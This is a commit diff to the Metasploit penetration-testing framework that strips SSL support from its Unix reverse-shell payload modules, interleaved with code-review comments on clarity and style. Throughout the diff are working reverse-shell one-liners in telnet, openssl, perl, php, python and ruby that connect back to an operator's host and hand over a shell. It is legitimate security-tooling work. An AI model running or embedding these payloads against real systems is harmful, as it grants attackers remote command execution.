
rev_tcp module cleanup:

restored pre-existing rev_tcp modules from upstream/master.
added reverse_php and reverse_python modules without SSL support
1 parent 05aa2a3 commit 4ced81e035516721803cee1f27489f6fee8fb123 RageLtMan committed Jun 9, 2012
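--- a/modules/payloads/singles/cmd/unix/reverse.rb
+++ b/modules/payloads/singles/cmd/unix/reverse.rb
@@ -21,13 +21,10 @@ module Metasploit3
 def initialize(info = {})
 super(merge_info(info,
- 'Name' => 'Unix Command Shell, Double reverse TCP (telnet) or Double reverse SSL (openssl)',
+ 'Name' => 'Unix Command Shell, Double reverse TCP (telnet)',
 'Version' => '$Revision$',
 'Description' => 'Creates an interactive shell through two inbound connections',
- 'Author' => [
- 'hdm', # original module
- 'RageLtMan' # SSL patch
- ],
+ 'Author' => 'hdm',
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
@@ -47,28 +44,19 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
- vprint_good(command_string)
 return super + command_string
 end
 #
 # Returns the command string to use for execution
 #
 def command_string
- if datastore['SSL']
- # PoC for ssl shell implementation with SslTcpServer
- cmd = "sh -c '(openssl s_client -connect #{datastore['LHOST']}:#{datastore['LPORT']}|" +
- "/bin/sh 2&>1|openssl s_client -connect #{datastore['LHOST']}:" +
- "#{datastore['LPORT']})'>/dev/null 2>&1 &"
- else
- cmd =
- "sh -c '(sleep #{3600+rand(1024)}|" +
- "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
- "while : ; do sh && break; done 2>&1|" +
- "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
- " >/dev/null 2>&1 &)'"
- end
-
+ cmd =
+ "sh -c '(sleep #{3600+rand(1024)}|" +
+ "telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
+ "while : ; do sh && break; done 2>&1|" +
+ "telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
+ " >/dev/null 2>&1 &)'"
 return cmd
 end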
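Review bot: With the SSL branch removed, `command_string` only ever builds a plain-text telnet session, and the unchanged 'Description' does not say so. The same applies to reverse_bash_telnet.rb, reverse_perl.rb, reverse_php.rb, reverse_python.rb and reverse_ruby.rb, whose descriptions merely drop "supports SSL". Everything typed or returned during an authorised test then crosses the network unencrypted and is readable by anything on the path, which matters when the target holds client data. I would state it in the metadata, e.g. `'Description' => 'Creates an interactive shell through two inbound connections (unencrypted)',`. The `initialize` body continues outside the first hunk.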
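--- a/modules/payloads/singles/cmd/unix/reverse_bash.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb
@@ -49,7 +49,6 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
- vprint_good(command_string)
 return super + command_string
 end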
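--- a/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
 'Description' => %q{
 Creates an interactive shell via mknod and telnet.
 This method works on Debian and other systems compiled
- without /dev/tcp support. Telnet-ssl support included.
+ without /dev/tcp support.
 },
 'Author' => 'RageLtMan',
 'License' => MSF_LICENSE,
@@ -57,10 +57,6 @@ def generate
 #
 def command_string
 pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 )
- if datastore['SSLHandler']
- cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
- else
- cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
- end
+ cmd = "mknod #{pipe_name} p && telnet #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &"
 end
 end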
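Review bot: `command_string` now ends on the bare assignment `cmd = "mknod …"`, so its return value is only a by-product of assigning a local that is never read. reverse.rb in this same commit ends with an explicit `return cmd`; either do the same here or drop the `cmd =` and leave the string as the last expression. The same trailing assignment remains in `command_string` in reverse_perl.rb and reverse_php.rb.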
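--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -44,7 +44,6 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
- vprint_good(command_string)
 return super + command_string
 end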
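--- a/modules/payloads/singles/cmd/unix/reverse_perl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb
@@ -23,8 +23,8 @@ def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP (via perl)',
 'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via perl, supports SSL',
- 'Author' => ['cazz', 'RageLtMan']
+ 'Description' => 'Creates an interactive shell via perl',
+ 'Author' => 'cazz',
 'License' => BSD_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
@@ -44,7 +44,6 @@ def initialize(info = {})
 # Constructs the payload
 #
 def generate
- vprint_good(command_string)
 return super + command_string
 end
@@ -55,12 +54,7 @@ def command_string
 lhost = datastore['LHOST']
 ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- # Need a succinct way to determine when $c is closed from the framework side, this method is presently unsafe as it leaves the process hanging
- cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");while($c){sysread($c,$i,8192);syswrite($c,`$i`);}'"
- else
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
- end
+ cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
 end
 end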
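--- a/modules/payloads/singles/cmd/unix/reverse_php.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP (via php)',
 'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via php, supports SSL',
+ 'Description' => 'Creates an interactive shell via php',
 'Author' => 'RageLtMan',
 'License' => BSD_LICENSE,
 'Platform' => 'unix',
@@ -55,11 +55,7 @@ def command_string
 lhost = datastore['LHOST']
 ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
- else
- cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
- end
+ cmd = "php -r '$s=fsockopen(\"#{datastore['LHOST']}\",#{datastore['LPORT']});exec(\"/bin/sh -i <&3 >&3 2>&3\");'&"
 end
 end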
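Review bot: The locals `lhost` and `ver` set in the three context lines of the second hunk are never used, because the remaining `cmd` line interpolates `datastore['LHOST']` directly. The IPv6 bracket handling therefore has no effect on the generated string, and `ver` is not referenced in any visible line. Either delete the unused assignments or interpolate `lhost` so the code does what those lines imply. The `def command_string` line itself sits above the hunk.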
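--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -23,7 +23,7 @@ def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP (via python)',
 'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell via python, supports SSL, encodes with base64 by design.',
+ 'Description' => 'Creates an interactive shell via python, encodes with base64 by design.',
 'Author' => 'RageLtMan',
 'License' => BSD_LICENSE,
 'Platform' => 'unix',
@@ -55,16 +55,9 @@ def command_string
 cmd = ''
 dead = Rex::Text.rand_text_alpha(2)
 # Set up the socket
- if datastore['SSLHandler']
- cmd += "import socket,subprocess,os,ssl\n"
- cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
- cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
- cmd += "s=ssl.wrap_socket(so)\n"
- else
- cmd += "import socket,subprocess,os\n"
- cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
- cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
- end
+ cmd += "import socket,subprocess,os\n"
+ cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+ cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
 # The actual IO
 cmd += "#{dead}=False\n"
 cmd += "while not #{dead}:\n"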
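Review bot: The three added lines in `command_string` keep building the script with `cmd += "…\n"`, which allocates a fresh String on every line. Appending in place reads the same and avoids the copies, e.g. `cmd << "import socket,subprocess,os\n"`, applied to each `+=` in the method. `command_string` starts above this hunk and continues below it, so the remaining `+=` lines are not all visible here.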
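--- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb
@@ -23,8 +23,8 @@ def initialize(info = {})
 super(merge_info(info,
 'Name' => 'Unix Command Shell, Reverse TCP (via Ruby)',
 'Version' => '$Revision$',
- 'Description' => 'Connect back and create a command shell via Ruby, supports SSL',
- 'Author' => ['kris katterjohn', 'RageLtMan']
+ 'Description' => 'Connect back and create a command shell via Ruby',
+ 'Author' => 'kris katterjohn',
 'License' => MSF_LICENSE,
 'Platform' => 'unix',
 'Arch' => ARCH_CMD,
@@ -37,17 +37,12 @@ def initialize(info = {})
 end
 def generate
- vprint_good(command_string)
 return super + command_string
 end
 def command_string
 lhost = datastore['LHOST']
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- if datastore['SSLHandler']
- "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
- else
- "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
- end
+ "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
 end
 end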
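Review bot: `generate` and `command_string` in the second hunk have no header comments, whereas the sibling modules in this commit document both methods. For consistency I would add `# Constructs the payload` above `def generate` and `# Returns the command string to use for execution` above `def command_string`, in the same `#`-framed style. It also appears that blank lines between the methods were dropped by the page rendering, so confirm the spacing against the file itself.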
